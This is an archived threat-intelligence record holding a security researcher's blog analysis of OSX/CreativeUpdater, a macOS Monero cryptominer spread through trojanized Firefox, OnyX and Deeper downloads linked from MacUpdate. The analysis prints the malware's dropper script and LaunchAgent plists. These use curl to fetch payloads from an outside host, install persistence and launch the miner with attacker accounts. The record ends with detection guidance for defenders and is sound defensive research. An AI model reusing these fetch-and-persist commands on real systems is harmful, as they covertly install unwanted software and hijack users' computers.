{
	"id": "47f9e3a0-259c-45a1-bcf1-680edfa759bb",
	"created_at": "2026-04-10T03:21:08.628728Z",
	"updated_at": "2026-04-10T13:11:49.243468Z",
	"deleted_at": null,
	"sha1_hash": "48002a270f7989a306f0bf7b40c5eb21e6cde2a6",
	"title": "Analyzing OSX/CreativeUpdater a macOS cryptominer, distributed via macupdate.com",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 99414,
	"plain_text": "Analyzing OSX/CreativeUpdater a macOS cryptominer, distributed via macupdate.com\r\nBy Patrick Wardle\r\nArchived: 2026-04-10 02:44:00 UTC\r\nBackground\r\nWe’re barely into 2018, and already there is another Mac trojan going around. Targeting macOS users, the malware was distributed via infected applications linked to on the popular MacUpdate website. Specifically, on February 1st, the MacUpdate editor ‘Jess-MacUpdate’ added comments on several popular applications such as Firefox:\r\nYikes!\r\nIn this short blog post we’ll dive into the malware, briefly discussing its persistence mechanism and capabilities.\r\nBefore diving in, I want to thank the following security researchers and friends:\r\n@noarfromspace who brought the malware to my attention, provided links and insightful comments about the malware, and AFAIK gets credit for the name OSX/CreativeUpdater!\r\n@thomasreed who also wrote a comprehensive blog post about this malware: “New Mac cryptominer distributed via a MacUpdate hack”. It’s definitely a worthwhile read!\r\n@marcetienne who provided valuable insight into both the discovery and analysis of the malware.\r\nOSX/CreativeUpdater\r\nSo, a user is happily browsing MacUpdate, ends up at their listing for Firefox (or OnyX or Deeper)…and decides to download it. As noted by Thomas Reed, the download link on the MacUpdate site had been modified to point to a hacker-controlled URL which served up the malware:\r\n“The fake Firefox app was distributed from download-installer.cdn-mozilla.net. (Notice the domain ends in cdn-mozilla.net, which is definitely not the same as mozilla.net. 
This is a common scammer trick to make you think it’s coming from a legitimate site.)”\r\nThus, instead of the legitimate Firefox application, a trojanized version would be served up to the user in the form of a signed disk image (Apple Developer ID: Ramos Jaxson):\r\nWe can mount this disk image by double-clicking it, or via the 'hdiutil' utility:\r\n $ hdiutil attach -noverify ~/Downloads/Firefox\\ 58.0.2.dmg\r\n/dev/disk3s2 Apple_HFS /Volumes/Firefox\r\nhttps://digitasecurity.com/blog/2018/02/05/creativeupdater/\r\nPage 1 of 8\n\nFirefox application contained in disk image\r\nThe application shown in the disk image, Firefox.app, is also signed with the same developer ID. The fact that both the disk image and the application are signed means that Gatekeeper (in its default settings) won’t block the malware from executing.\r\nLooking at the contents of the trojanized Firefox application bundle shows the main binary ('MozillaFirefox') and reveals another Firefox application as well as a script (aptly named 'script') in the Resources directory:\r\nIt’s easy to confirm the validity of this second Firefox application by checking its digital signature (and ensuring it’s signed by Mozilla). 
The WhatsYourSign Finder extension will display this signing information via the UI:\r\nSigned Firefox application\r\nAs we’ll shortly see, the malware will execute the legitimate Firefox application so that the user will not suspect anything malicious has occurred!\r\nDecompiling the main executable, 'MozillaFirefox', we can see it looking for the 'script' file:\r\n void -[ScriptExecController loadAppSettings](void * self, void * _cmd) {\r\n     r13 = [[var_1B0 pathForResource:@\"script\" ofType:0x0] retain];\r\n     r15 = @selector(defaultManager);\r\n     r12 = [_objc_msgSend_100015138(@class(NSFileManager), r15) retain];\r\n     rbx = [[var_1B0 pathForResource:@\"script\" ofType:0x0] retain];\r\n     r14 = [r12 fileExistsAtPath:rbx];\r\n     if (r14 == 0x0) {\r\n         [Alerts fatalAlert:@\"Corrupt app bundle\"\r\n                   subText:@\"Script missing from application bundle.\"];\r\n     }\r\n     ...\r\n }\r\nIt then executes it, via a call to the '-[ScriptExecController executeScript]' method:\r\n void -[ScriptExecController executeScript](void * self, void * _cmd) {\r\n     rbx = self;\r\n     [rbx prepareForExecution];\r\n     [rbx prepareInterfaceForExecution];\r\n     *(int8_t *)(rbx + r14) = 0x1;\r\n     if (*(int32_t *)\u0026rbx-\u003eexecStyle == 0x1) {\r\n         rsi = @selector(executeScriptWithPrivileges);\r\n     }\r\n     else {\r\n         rsi = @selector(executeScriptWithoutPrivileges);\r\n     }\r\n     (*_objc_msgSend)(rbx, rsi);\r\n     return;\r\n }\r\n void -[ScriptExecController executeScriptWithoutPrivileges](void * self, void * _cmd) {\r\n     r13-\u003etask = [[NSTask alloc] init];\r\n     [r13-\u003etask setLaunchPath:r13-\u003einterpreterPath];\r\n     [r13-\u003etask setArguments:r13-\u003earguments];\r\n     [r13-\u003etask launch];\r\n     ...\r\n }\r\nAs noted by @noarfromspace on Twitter, OSX/CreativeUpdater was created using a legitimate developer tool called Platypus. 
According to its website:\r\n“Platypus is a Mac OS X developer tool that creates native Mac applications from interpreted scripts such as shell scripts or Perl, Ruby and Python programs. This is done by wrapping the script in an application bundle along with a native executable binary that runs the script.”\r\nThis explains why the main application (i.e. the trojanized Firefox.app) simply executes the 'script' file when run.\r\nHrmm, where have we seen Platypus used before!? In OSX/Eleanor, and as I noted on Twitter it also used MacUpdate to spread:\r\nIntriguing! Are they related? Who knows…\r\nMoving on, let’s peek at the script that’s executed when the malicious application is started:\r\n $ cat Firefox.app/Contents/Resources/script\r\n \r\nopen Firefox.app\r\nif [ -f ~/Library/mdworker/mdworker ]; then\r\n    killall MozillaFirefox\r\nelse\r\n    nohup curl -o ~/Library/mdworker.zip https://public.adobecc.com/files/1U14RSV3MVAHBMEGVS4LZ42AFNYEFF?content_disposition=attachment \\\r\n    \u0026\u0026 unzip -o ~/Library/mdworker.zip -d ~/Library \\\r\n    \u0026\u0026 mkdir -p ~/Library/LaunchAgents \\\r\n    \u0026\u0026 mv ~/Library/mdworker/MacOSupdate.plist ~/Library/LaunchAgents \\\r\n    \u0026\u0026 sleep 300 \\\r\n    \u0026\u0026 launchctl load -w ~/Library/LaunchAgents/MacOSupdate.plist \\\r\n    \u0026\u0026 rm -rf ~/Library/mdworker.zip \\\r\n    \u0026\u0026 killall MozillaFirefox \u0026\r\nfi\r\nAs Thomas Reed notes:\r\n“…this code first attempts to open the decoy application. Next, if the malware is already installed, the malicious dropper process is killed, since installation is not necessary. If the malware is not installed, it will download the malware and unzip it into the user’s Library folder…It also installs a malicious launch agent file named MacOSupdate.plist, which recurrently runs another script.”\r\nIn other words, it simply downloads and installs a persistent payload. 
What could this be?\r\nThough the zip file the malware tries to download (mdworker.zip, from https://public.adobecc.com/files/1U14RSV3MVAHBMEGVS4LZ42AFNYEFF) is no longer available, luckily we can grab it from VirusTotal.\r\nFirst, let’s look at the 'MacOSupdate.plist' file:\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n\u003cplist version=\"1.0\"\u003e\r\n\u003cdict\u003e\r\n    \u003ckey\u003eLabel\u003c/key\u003e\r\n    \u003cstring\u003eMacOSupdate\u003c/string\u003e\r\n    \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n    \u003carray\u003e\r\n        \u003cstring\u003esh\u003c/string\u003e\r\n        \u003cstring\u003e-c\u003c/string\u003e\r\n        \u003cstring\u003elaunchctl unload -w ~/Library/LaunchAgents/MacOS.plist \u0026amp;\u0026amp; rm -rf ~/Library/LaunchAgents/MacOS.plist \u0026amp;\u0026amp; curl -o ~/Library/LaunchAgents/MacOS.plist https://public.adobecc.com/files/1UJET2WD0VPD5SD0CRLX0EH2UIEEFF?content_disposition=attachment \u0026amp;\u0026amp; launchctl load -w ~/Library/LaunchAgents/MacOS.plist \u0026amp;\u0026amp; ~/Library/mdworker/mdworker\u003c/string\u003e\r\n    \u003c/array\u003e\r\n    \u003ckey\u003eRunAtLoad\u003c/key\u003e\r\n    ...\r\n\u003c/dict\u003e\r\n\u003c/plist\u003e\r\nOk, kinda stupid - just downloads and installs another (new?) version of MacOS.plist.\r\nLooking at these ‘secondary’ instances of the plist, one can see they persistently execute something named 'mdworker' out of the ~/Library/mdworker/ directory:\r\n //version 1\r\n$ cat ~/Library/LaunchAgents/MacOS.plist\r\n...\r\n\u003ckey\u003eProgramArguments\u003c/key\u003e\r\n\u003carray\u003e\r\n    \u003cstring\u003esh\u003c/string\u003e\r\n    \u003cstring\u003e-c\u003c/string\u003e\r\n    \u003cstring\u003e~/Library/mdworker/mdworker -user sarahmayergo1990@gmail.com -xmr -proxy socks://104.236.13.101:1080\u003c/string\u003e\r\n\u003c/array\u003e\r\n...\r\n //version 2\r\n$ cat ~/Library/LaunchAgents/MacOS.plist\r\n...\r\n\u003ckey\u003eProgramArguments\u003c/key\u003e\r\n\u003carray\u003e\r\n    \u003cstring\u003esh\u003c/string\u003e\r\n    \u003cstring\u003e-c\u003c/string\u003e\r\n    \u003cstring\u003e~/Library/mdworker/mdworker -user walker18@protonmail.ch -xmr\u003c/string\u003e\r\n\u003c/array\u003e\r\n...\r\nRunning the mdworker binary (in a virtual machine) reveals it is simply MinerGate’s command-line cryptominer, minergate-cli:\r\n $ ./mdworker -help\r\nUsage:\r\nminergate-cli [-version] -user [-proxy ]\r\n - []\r\n [- [] ...]\r\n [-o -u [-t ]\r\n [-i ]]\r\nThis utility is freely available for download from: minergate.com/downloads/console.\r\nSince the miner is invoked with the -xmr flag, infected computers will mine Monero. And what about those email addresses? 
Thomas notes the mining software will “periodically connect to minergate.com, passing in the email address as the login”.\r\nSo now we fully understand the goal of the malware: mine cryptocurrencies. Really nothing too exciting - but a trend we’re seeing more and more on macOS!\r\nAnd if you’re wondering who did it? Well, there may be some hints buried within the disk image files. If we look closely (as noted by @noarfromspace), there’s a .DS_Store file in the root directory of the dmg!\r\n $ ls -lart /Volumes/Firefox/ | grep .DS_Store\r\n-rw-r--r--@ 1 user staff 10244 Jan 31 11:18 .DS_Store\r\nAs explained by Wikipedia, “.DS_Store is a file that stores custom attributes of its containing folder, such as the position of icons or the choice of a background image.” However, .DS_Store files may also contain paths…such as the original (full) path of the .dmg on the attacker’s machine.\r\nLet’s run strings on each of the .DS_Store files:\r\n $ strings -a .DS_Store | grep tiago\r\ntiagobrandaomateus\r\n/Users/tiagobrandaomateus/teste/macupdate/Firefox_temp.dmg\r\n$ strings -a /Volumes/OnyX\\ 3.4.2/.DS_Store | grep -i tiago\r\ntiagobrandaomateus\r\n/Users/tiagobrandaomateus/teste/macupdate/OnyX 3.4.2_temp.dmg\r\n$ strings -a /Volumes/Deeper\\ 2.2.7/.DS_Store | grep -i tiago\r\ntiagobrandaomateus\r\n/Users/tiagobrandaomateus/macupdate/deeper-app/Deeper 2.2.7_temp.dmg\r\nInteresting, I wonder who Tiago Brandão Mateus is!?\r\nConclusions\r\nIn this blog post we provided a technical analysis of the newly discovered macOS cryptominer OSX/CreativeUpdater. 
Though not particularly sophisticated or insidious, by utilizing MacUpdate as its infection vector it had the potential to infect a large number of users.\r\nLet’s end with a few FAQs!\r\nQ: How does one get infected by OSX/CreativeUpdater?\r\nA: By downloading an infected application from MacUpdate. Specifically, one of the following applications:\r\n“Firefox 58.0.2 since 1 February 2018”\r\n“Onyx since 1 February 2018” (likely version 3.4.2)\r\n“Deeper since 1 February 2018” (likely version 2.2.7)\r\nQ: Can I still get infected?\r\nA: Unlikely. MacUpdate notes that they “have removed the [malicious] link[s]”. Moreover, Apple has revoked the certificate used to sign the malicious disk images and application:\r\nOnce the certificate has been revoked, the disk images won’t mount, nor will the applications run (via the UI):\r\nQ: How can I tell if I’m infected with OSX/CreativeUpdater?\r\nA: First, check to see if there is a process named mdworker or sysmdworker running from ~/Library/mdworker/:\r\n $ ps aux | grep [/]Library/mdworker/\r\nuser 2199 /Users/user/Library/mdworker/mdworker\r\nOne can also look for the persistent artifacts of the malware. This includes the following files \u0026 directories:\r\n~/Library/mdworker/\r\n~/Library/LaunchAgents/MacOSupdate.plist\r\nThe KnockKnock tool will also display the launch agent plist (~/Library/mdworker/MacOSupdate.plist):\r\nQ: On an infected system, what can OSX/CreativeUpdater do?\r\nA: OSX/CreativeUpdater is designed to simply mine Monero (XMR) cryptocoins. While this will likely use a large percentage of your CPU, that’s about the only side effect. It should be noted that as the malware does (did?) have the ability to update itself, the attacker could have provided a customized payload. 
However, at this time there is no indication that this happened.\r\nQ: Your tools will protect against this, right?\r\nA: Digita Security is working hard to bring you enterprise-ready and supported macOS endpoint protection capabilities in 2018! Many of them will be powered by the free Objective-See technologies referenced throughout this blog.\r\nFor example, BlockBlock will detect the persistence (when the malware downloads \u0026 creates the launch agent plist via curl):\r\nLuLu will also display an alert when the malware connects out (again via curl) to download various components:\r\nWell, that wraps up our blog on OSX/CreativeUpdater! Mahalo for reading 😊\r\nSource: https://digitasecurity.com/blog/2018/02/05/creativeupdater/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://digitasecurity.com/blog/2018/02/05/creativeupdater/"
	],
	"report_names": [
		"creativeupdater"
	],
	"threat_actors": [],
	"ts_created_at": 1775791268,
	"ts_updated_at": 1775826709,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/48002a270f7989a306f0bf7b40c5eb21e6cde2a6.pdf",
		"text": "https://archive.orkl.eu/48002a270f7989a306f0bf7b40c5eb21e6cde2a6.txt",
		"img": "https://archive.orkl.eu/48002a270f7989a306f0bf7b40c5eb21e6cde2a6.jpg"
	}
}